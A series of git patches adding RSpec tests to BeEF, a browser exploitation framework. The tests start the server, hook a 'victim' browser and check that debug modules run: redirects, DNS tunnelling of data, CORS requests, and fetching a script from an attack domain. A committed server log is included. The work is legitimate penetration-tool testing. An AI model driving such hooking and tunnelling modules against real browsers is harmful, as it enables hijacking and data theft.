From 71cecf4e5ea29ff3061cb87898708be9b5b76e04 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Thu, 9 Apr 2020 12:12:09 +1000 Subject: [PATCH 1/9] Added debug unit tests --- .../modules/debug/test_beef_debugs_spec.rb | 128 ++++++++++++++++++ 1 file changed, 128 insertions(+) create mode 100644 spec/beef/modules/debug/test_beef_debugs_spec.rb diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb new file mode 100644 index 000000000..ec4a3b44a --- /dev/null +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -0,0 +1,128 @@ +# +# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +require 'rest-client' +require 'json' +require_relative '../../../support/constants' +require_relative '../../../support/beef_test' + +RSpec.describe 'BeEF Debug Command Modules:' do + + before(:each) do + # Grab config and set creds in variables for ease of access + @config = BeEF::Core::Configuration.instance + @username = @config.get('beef.credentials.user') + @password = @config.get('beef.credentials.passwd') + + # Authenticate to RESTful API endpoint to generate token for future tests + response = RestClient.post "#{RESTAPI_ADMIN}/login", + { 'username': "#{@username}", + 'password': "#{@password}" }.to_json, + :content_type => :json + @token = JSON.parse(response)['token'] + hooks = RestClient.get "#{RESTAPI_HOOKS}?token=#{@token}" + @session = JSON.parse(hooks)['hooked-browsers']['online']['0']['session'] + end + + describe 'Test_beef.debug() command module' do + it 'successfully executes' do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/27?token=#{@token}", + { "msg": "Testing Test_beef.debug() command module" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + end + + describe 'Return ASCII Characters command module' do + it 'successfully executes' do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/25?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + end + + describe 'Return Image command module' do + it "successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/22?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + end + + describe "Test HTTP Redirect command module" do + before(:each) do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/24?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + it 'is successfully redirected to the specified URL' do + redirect_response = RestClient.get "http://#{ATTACK_DOMAIN}:3000/redirect" + expect(redirect_response.request.url).to eq "https://beefproject.com/" + end + end + + describe "Test Returning Results/Long String command module" do + it "successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + { "repeat": 20, + "repeat_string": "beef" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + end + + describe "Test Network Request command module" do + it "successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + { "scheme": "http", + "method": "GET", + "domain": "#{ATTACK_DOMAIN}", + "port": "#{@config.get('beef.http.port')}", + "path": "/hook.js", + "anchor": "anchor", + "data": "query=testquerydata", + "timeout": "10", + "dataType": "script" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + end + + describe "Test DNS Tunnel command module" do + it "successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/26?token=#{@token}", + { "domain": "example.com", + "data": "Lorem ipsum" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + end + + describe "Test CORS Request command module" do + it "successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/30?token=#{@token}", + { "method": "GET", + "url": "example.com", + "data": { + "test": "data" + }}.to_json, + content_type: :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + end +end \ No newline at end of file From d8fac13f8f878cefc38c9b66c4a52505564b24c1 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Thu, 9 Apr 2020 13:03:08 +1000 Subject: [PATCH 2/9] Trying to automate API server --- .../modules/debug/test_beef_debugs_spec.rb | 49 ++++++++++++++----- 1 file changed, 38 insertions(+), 11 deletions(-) diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb index ec4a3b44a..526401e2e 100644 --- a/spec/beef/modules/debug/test_beef_debugs_spec.rb +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -12,24 +12,51 @@ require_relative '../../../support/beef_test' RSpec.describe 'BeEF Debug Command Modules:' do before(:each) do + # Note: rake spec passes --patterns which causes BeEF to pickup this argument via optparse. I can't see a better way at the moment to filter this out. Therefore ARGV=[] for this test. + ARGV = [] + # Grab config and set creds in variables for ease of access @config = BeEF::Core::Configuration.instance @username = @config.get('beef.credentials.user') @password = @config.get('beef.credentials.passwd') + + # Spawn HTTP Server + http_hook_server = BeEF::Core::Server.instance + http_hook_server.prepare + + @pids = fork do + BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) + end + @pid = fork do + http_hook_server.start + end + + # Wait for server to start + sleep 2 + + @restclient = BeefRestClient.new('http', ATTACK_DOMAIN, '3000', @username, @password) # Authenticate to RESTful API endpoint to generate token for future tests - response = RestClient.post "#{RESTAPI_ADMIN}/login", + response = @restclient.post "#{RESTAPI_ADMIN}/login", { 'username': "#{@username}", 'password': "#{@password}" }.to_json, :content_type => :json @token = JSON.parse(response)['token'] - hooks = RestClient.get "#{RESTAPI_HOOKS}?token=#{@token}" + hooks = @restclient.get "#{RESTAPI_HOOKS}?token=#{@token}" @session = JSON.parse(hooks)['hooked-browsers']['online']['0']['session'] + + # Hook new victim + victim = BeefTest.new_victim + end + + after(:each) do + Process.kill("KILL",@pid) + Process.kill("KILL",@pids) end describe 'Test_beef.debug() command module' do it 'successfully executes' do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/27?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/27?token=#{@token}", { "msg": "Testing Test_beef.debug() command module" }.to_json, :content_type => :json result_data = JSON.parse(response.body) @@ -39,7 +66,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do describe 'Return ASCII Characters command module' do it 'successfully executes' do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/25?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/25?token=#{@token}", { }.to_json, :content_type => :json result_data = JSON.parse(response.body) @@ -49,7 +76,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do describe 'Return Image command module' do it "successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/22?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/22?token=#{@token}", { }.to_json, :content_type => :json result_data = JSON.parse(response.body) @@ -59,7 +86,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do describe "Test HTTP Redirect command module" do before(:each) do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/24?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/24?token=#{@token}", { }.to_json, :content_type => :json result_data = JSON.parse(response.body) @@ -67,14 +94,14 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'is successfully redirected to the specified URL' do - redirect_response = RestClient.get "http://#{ATTACK_DOMAIN}:3000/redirect" + redirect_response = @restclient.get "http://#{ATTACK_DOMAIN}:3000/redirect" expect(redirect_response.request.url).to eq "https://beefproject.com/" end end describe "Test Returning Results/Long String command module" do it "successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", { "repeat": 20, "repeat_string": "beef" }.to_json, :content_type => :json @@ -85,7 +112,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do describe "Test Network Request command module" do it "successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", { "scheme": "http", "method": "GET", "domain": "#{ATTACK_DOMAIN}", @@ -103,7 +130,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do describe "Test DNS Tunnel command module" do it "successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/26?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/26?token=#{@token}", { "domain": "example.com", "data": "Lorem ipsum" }.to_json, :content_type => :json @@ -114,7 +141,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do describe "Test CORS Request command module" do it "successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/30?token=#{@token}", + response = @restclient.post "#{RESTAPI_MODULES}/#{@session}/30?token=#{@token}", { "method": "GET", "url": "example.com", "data": { From 0ffd87059acafefb581b69160ea8068ac4095da6 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Tue, 14 Apr 2020 10:40:50 +1000 Subject: [PATCH 3/9] Resolved issues preventing server starting w/ test. Tests now passing. --- config.yaml | 2 +- modules/debug/test_get_variable/config.yaml | 2 +- .../modules/debug/test_beef_debugs_spec.rb | 164 ++++++++++++++++++ 3 files changed, 166 insertions(+), 2 deletions(-) create mode 100644 spec/beef/modules/debug/test_beef_debugs_spec.rb diff --git a/config.yaml b/config.yaml index d4d93e81b..64039f64f 100644 --- a/config.yaml +++ b/config.yaml @@ -18,7 +18,7 @@ beef: # Used by both the RESTful API and the Admin interface credentials: user: "beef" - passwd: "beef" + passwd: "beef1" # Interface / IP restrictions restrictions: diff --git a/modules/debug/test_get_variable/config.yaml b/modules/debug/test_get_variable/config.yaml index efb400759..f26bc835c 100644 --- a/modules/debug/test_get_variable/config.yaml +++ b/modules/debug/test_get_variable/config.yaml @@ -6,7 +6,7 @@ beef: module: test_get_variable: - enable: false + enable: true category: "Debug" name: "Test JS variable passing" description: "Test for JS variable passing from another BeEF's script via Window object" diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb new file mode 100644 index 000000000..bbbc4afd5 --- /dev/null +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -0,0 +1,164 @@ +# +# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +require 'rest-client' +require 'json' +require_relative '../../../support/constants' +require_relative '../../../support/beef_test' + +RSpec.describe 'BeEF Debug Command Modules:' do + + before(:all) do + # Grab config and set creds in variables for ease of access + @config = BeEF::Core::Configuration.instance + @username = @config.get('beef.credentials.user') + @password = @config.get('beef.credentials.passwd') + + # Load BeEF exetensions and modules + BeEF::Extensions.load + + sleep 10 + + BeEF::Modules.load + + # Grab DB file and regenerate if requested + db_file = @config.get('beef.database.file') + + if BeEF::Core::Console::CommandLine.parse[:resetdb] + print_info 'Resetting the database for BeEF.' + File.delete(db_file) if File.exists?(db_file) + end + + # Load up DB and migrate if necessary + ActiveRecord::Base.logger = nil + OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] + OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database: db_file) + + context = ActiveRecord::Migration.new.migration_context + if context.needs_migration? + ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate + end + + sleep 10 + + BeEF::Core::Migration.instance.update_db! + + # Spawn HTTP Server + http_hook_server = BeEF::Core::Server.instance + http_hook_server.prepare + + # Generate a token for the server to respond with + BeEF::Core::Crypto::api_token + + # Initiate server start-up + @pids = fork do + BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) + end + @pid = fork do + http_hook_server.start + end + + # Give the server time to start-up + sleep 1 + + # Authenticate to REST API & pull the token from the response + @response = RestClient.post "#{RESTAPI_ADMIN}/login", { 'username': "#{@username}", 'password': "#{@password}" }.to_json, :content_type => :json + @token = JSON.parse(@response)['token'] + + # Hook new victim + @victim = BeefTest.new_victim + + sleep 5 + + # Identify Session ID of victim generated above + @hooks = RestClient.get "#{RESTAPI_HOOKS}?token=#{@token}" + @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + end + + after(:all) do + Process.kill("KILL",@pid) + Process.kill("KILL",@pids) + end + + it 'The Test_beef.debug() command module successfully executes' do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/27?token=#{@token}", + { "msg": "test" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + it 'The Return ASCII Characters command module successfully executes' do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/25?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + it "The Return Image command module successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/22?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + + it 'The Test HTTP Redirect command module successfully executes' do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/24?token=#{@token}", + { }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + it "The Test Returning Results/Long String command module successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + { "repeat": 20, + "repeat_string": "beef" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + it "The Test Network Request command module successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + { "scheme": "http", + "method": "GET", + "domain": "#{ATTACK_DOMAIN}", + "port": "#{@config.get('beef.http.port')}", + "path": "/hook.js", + "anchor": "anchor", + "data": "query=testquerydata", + "timeout": "10", + "dataType": "script" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + it "The Test DNS Tunnel command module successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/26?token=#{@token}", + { "domain": "example.com", + "data": "Lorem ipsum" }.to_json, + :content_type => :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end + + it "The Test CORS Request command module successfully executes" do + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/30?token=#{@token}", + { "method": "GET", + "url": "example.com", + "data": { + "test": "data" + }}.to_json, + content_type: :json + result_data = JSON.parse(response.body) + expect(result_data['success']).to eq "true" + end +end \ No newline at end of file From c610aa16666aec103f719045f172d82d83d1a94a Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Tue, 14 Apr 2020 10:41:32 +1000 Subject: [PATCH 4/9] Fixed change to config.yaml creds --- config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/config.yaml b/config.yaml index 64039f64f..d4d93e81b 100644 --- a/config.yaml +++ b/config.yaml @@ -18,7 +18,7 @@ beef: # Used by both the RESTful API and the Admin interface credentials: user: "beef" - passwd: "beef1" + passwd: "beef" # Interface / IP restrictions restrictions: From 804fc6363ae8ed3adcea1c744cbe94cbc0ddb912 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Thu, 16 Apr 2020 08:54:04 +1000 Subject: [PATCH 5/9] Implemented BrowserStack testing into debug module tests. --- .../modules/debug/test_beef_debugs_spec.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb index bbbc4afd5..d434493e9 100644 --- a/spec/beef/modules/debug/test_beef_debugs_spec.rb +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -33,13 +33,13 @@ RSpec.describe 'BeEF Debug Command Modules:' do end # Load up DB and migrate if necessary - ActiveRecord::Base.logger = nil - OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] + ActiveRecord::Base.logger = nil + OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database: db_file) - context = ActiveRecord::Migration.new.migration_context - if context.needs_migration? - ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate + context = ActiveRecord::Migration.new.migration_context + if context.needs_migration? + ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate end sleep 10 @@ -51,15 +51,15 @@ RSpec.describe 'BeEF Debug Command Modules:' do http_hook_server.prepare # Generate a token for the server to respond with - BeEF::Core::Crypto::api_token + BeEF::Core::Crypto::api_token # Initiate server start-up @pids = fork do BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) - end - @pid = fork do - http_hook_server.start - end + end + @pid = fork do + http_hook_server.start + end # Give the server time to start-up sleep 1 @@ -80,7 +80,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do after(:all) do Process.kill("KILL",@pid) - Process.kill("KILL",@pids) + Process.kill("KILL",@pids) end it 'The Test_beef.debug() command module successfully executes' do @@ -161,4 +161,4 @@ RSpec.describe 'BeEF Debug Command Modules:' do result_data = JSON.parse(response.body) expect(result_data['success']).to eq "true" end -end \ No newline at end of file +end From 55112fe49234b4353600f0d5fd04c7563e52a316 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Thu, 16 Apr 2020 10:30:16 +1000 Subject: [PATCH 6/9] Fixed hard coded command modules --- .../modules/debug/test_beef_debugs_spec.rb | 46 +++++++++++++------ 1 file changed, 31 insertions(+), 15 deletions(-) diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb index d434493e9..889e70693 100644 --- a/spec/beef/modules/debug/test_beef_debugs_spec.rb +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -17,7 +17,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do @username = @config.get('beef.credentials.user') @password = @config.get('beef.credentials.passwd') - # Load BeEF exetensions and modules + # Load BeEF extensions and modules BeEF::Extensions.load sleep 10 @@ -76,6 +76,14 @@ RSpec.describe 'BeEF Debug Command Modules:' do # Identify Session ID of victim generated above @hooks = RestClient.get "#{RESTAPI_HOOKS}?token=#{@token}" @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + # Grab Command Module IDs as they can differ from machine to machine + @debug_mod_ids = JSON.parse(RestClient.get "#{RESTAPI_MODULES}?token=#{@token}") + @debug_mod_names_ids = {} + @debug_mods = @debug_mod_ids.to_a.select { |cmd_mod| cmd_mod[1]['category'] == 'Debug' } + .map do |debug_mod| + @debug_mod_names_ids[debug_mod[1]['class']] = debug_mod[0] + end end after(:all) do @@ -84,7 +92,8 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Test_beef.debug() command module successfully executes' do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/27?token=#{@token}", + cmd_mod_id = debug_mod_names_ids['Test_beef_debug'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "msg": "test" }.to_json, :content_type => :json result_data = JSON.parse(response.body) @@ -92,15 +101,17 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Return ASCII Characters command module successfully executes' do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/25?token=#{@token}", + cmd_mod_id = debug_mod_names_ids['Test_return_ascii_chars'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { }.to_json, :content_type => :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq "true" end - it "The Return Image command module successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/22?token=#{@token}", + it 'The Return Image command module successfully executes' do + cmd_mod_id = debug_mod_names_ids['Test_return_image'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { }.to_json, :content_type => :json result_data = JSON.parse(response.body) @@ -109,15 +120,17 @@ RSpec.describe 'BeEF Debug Command Modules:' do it 'The Test HTTP Redirect command module successfully executes' do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/24?token=#{@token}", + cmd_mod_id = debug_mod_names_ids['Test_http_redirect'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { }.to_json, :content_type => :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq "true" end - it "The Test Returning Results/Long String command module successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + it 'The Test Returning Results/Long String command module successfully executes' do + cmd_mod_id = debug_mod_names_ids['Test_return_long_string'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "repeat": 20, "repeat_string": "beef" }.to_json, :content_type => :json @@ -125,8 +138,9 @@ RSpec.describe 'BeEF Debug Command Modules:' do expect(result_data['success']).to eq "true" end - it "The Test Network Request command module successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/29?token=#{@token}", + it 'The Test Network Request command module successfully executes' do + cmd_mod_id = debug_mod_names_ids['Test_network_request'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "scheme": "http", "method": "GET", "domain": "#{ATTACK_DOMAIN}", @@ -141,8 +155,9 @@ RSpec.describe 'BeEF Debug Command Modules:' do expect(result_data['success']).to eq "true" end - it "The Test DNS Tunnel command module successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/26?token=#{@token}", + it 'The Test DNS Tunnel command module successfully executes' do + cmd_mod_id = debug_mod_names_ids['Test_dns_tunnel_client'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "domain": "example.com", "data": "Lorem ipsum" }.to_json, :content_type => :json @@ -150,8 +165,9 @@ RSpec.describe 'BeEF Debug Command Modules:' do expect(result_data['success']).to eq "true" end - it "The Test CORS Request command module successfully executes" do - response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/30?token=#{@token}", + it 'The Test CORS Request command module successfully executes' do + cmd_mod_id = debug_mod_names_ids['Test_cors_request'] + response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "method": "GET", "url": "example.com", "data": { @@ -161,4 +177,4 @@ RSpec.describe 'BeEF Debug Command Modules:' do result_data = JSON.parse(response.body) expect(result_data['success']).to eq "true" end -end +end \ No newline at end of file From 3b20c8eee973d5d52ff2b8543d879d0c2d67fa2b Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Thu, 16 Apr 2020 10:33:33 +1000 Subject: [PATCH 7/9] Missing class variable tags --- spec/beef/modules/debug/test_beef_debugs_spec.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb index 889e70693..5730df65c 100644 --- a/spec/beef/modules/debug/test_beef_debugs_spec.rb +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -92,7 +92,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Test_beef.debug() command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_beef_debug'] + cmd_mod_id = @debug_mod_names_ids['Test_beef_debug'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "msg": "test" }.to_json, :content_type => :json @@ -101,7 +101,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Return ASCII Characters command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_return_ascii_chars'] + cmd_mod_id = @debug_mod_names_ids['Test_return_ascii_chars'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { }.to_json, :content_type => :json @@ -110,7 +110,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Return Image command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_return_image'] + cmd_mod_id = @debug_mod_names_ids['Test_return_image'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { }.to_json, :content_type => :json @@ -120,7 +120,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do it 'The Test HTTP Redirect command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_http_redirect'] + cmd_mod_id = @debug_mod_names_ids['Test_http_redirect'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { }.to_json, :content_type => :json @@ -129,7 +129,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Test Returning Results/Long String command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_return_long_string'] + cmd_mod_id = @debug_mod_names_ids['Test_return_long_string'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "repeat": 20, "repeat_string": "beef" }.to_json, @@ -139,7 +139,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Test Network Request command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_network_request'] + cmd_mod_id = @debug_mod_names_ids['Test_network_request'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "scheme": "http", "method": "GET", @@ -156,7 +156,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Test DNS Tunnel command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_dns_tunnel_client'] + cmd_mod_id = @debug_mod_names_ids['Test_dns_tunnel_client'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "domain": "example.com", "data": "Lorem ipsum" }.to_json, @@ -166,7 +166,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do end it 'The Test CORS Request command module successfully executes' do - cmd_mod_id = debug_mod_names_ids['Test_cors_request'] + cmd_mod_id = @debug_mod_names_ids['Test_cors_request'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "method": "GET", "url": "example.com", From 0a39de17e0be8e5f6be95a36a5ba1b4db50d8dc7 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Thu, 16 Apr 2020 13:11:26 +1000 Subject: [PATCH 8/9] Add handling to only load modules and extensions if they are not already loaded. --- .../modules/debug/test_beef_debugs_spec.rb | 17 +- test.log | 1656 +++++++++++++++++ 2 files changed, 1669 insertions(+), 4 deletions(-) create mode 100644 test.log diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb index 5730df65c..cacb341f1 100644 --- a/spec/beef/modules/debug/test_beef_debugs_spec.rb +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -8,6 +8,8 @@ require 'rest-client' require 'json' require_relative '../../../support/constants' require_relative '../../../support/beef_test' +require_relative '../../../../core/module' +require 'byebug' RSpec.describe 'BeEF Debug Command Modules:' do @@ -18,11 +20,18 @@ RSpec.describe 'BeEF Debug Command Modules:' do @password = @config.get('beef.credentials.passwd') # Load BeEF extensions and modules - BeEF::Extensions.load + if @config.get('beef.extension').keys.length == 10 + BeEF::Extensions.load - sleep 10 + sleep 5 + end - BeEF::Modules.load + + if @config.get('beef.module').nil? + BeEF::Modules.load + + sleep 5 + end # Grab DB file and regenerate if requested db_file = @config.get('beef.database.file') @@ -42,7 +51,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate end - sleep 10 + sleep 5 BeEF::Core::Migration.instance.update_db! diff --git a/test.log b/test.log new file mode 100644 index 000000000..736b042e9 --- /dev/null +++ b/test.log @@ -0,0 +1,1656 @@ +[12:25:15][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. + +Randomized with seed 39338 + +BeEF Redirector + redirects + +AutoRunEngine test +[12:25:16][>] Server: mounted handler '/hook.js' +[12:25:16][>] Server: mounted handler '/init' +[12:25:16][>] Server: mounted handler '/' +[12:25:16][>] Server: mounted handler '/dh' +[12:25:16][>] Server: mounted handler '/api/hooks' +[12:25:16][>] Server: mounted handler '/api/browserdetails' +[12:25:16][>] Server: mounted handler '/api/modules' +[12:25:16][>] Server: mounted handler '/api/categories' +[12:25:16][>] Server: mounted handler '/api/logs' +[12:25:16][>] Server: mounted handler '/api/admin' +[12:25:16][>] Server: mounted handler '/api/server' +[12:25:16][>] Server: mounted handler '/api/autorun' +[12:25:16][>] Server: mounted handler '/api/dns' +[12:25:16][>] Server: mounted handler '/api/ipec' +[12:25:16][>] Server: mounted handler '/api/proxy' +[12:25:16][>] Server: mounted handler '/requester' +[12:25:16][>] Server: mounted handler '/api/requester' +[12:25:16][>] Server: mounted handler '/xssrays' +[12:25:16][>] Server: mounted handler '/api/xssrays' +[12:25:16][!] API Fire Error: undefined method `[]' for nil:NilClass in {:owner=>BeEF::Extension::Dns::API::NameserverHandler, :id=>11}.pre_http_start() +[12:25:16][*] HTTP Proxy: http://: +[12:25:16][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() +authenticated. api token: ec1836817b7d733ebc03d7aba422a27cf27d471f +hooking a new victim, waiting a few seconds... + AutoRunEngine is working + +Browser details handler +[12:25:25][>] Server: mounted handler '/hook.js' +[12:25:25][>] Server: mounted handler 